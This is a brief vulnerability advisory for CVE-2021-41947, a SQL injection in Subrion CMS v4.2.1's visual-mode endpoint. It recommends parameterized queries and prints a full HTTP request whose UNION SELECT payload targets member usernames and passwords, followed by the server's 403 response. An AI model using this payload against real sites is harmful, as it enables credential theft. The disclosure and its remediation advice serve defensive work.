CVE-2021-41947
Description:
A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual mode. This application should not incorporate any user-controllable data directly into SQL queries. Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself?
MySQL Request:
GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0MySQL Response:
HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json
{"error":true,"message":"Action is forbidden.","code":403,"result":true}Risk:
- Medium
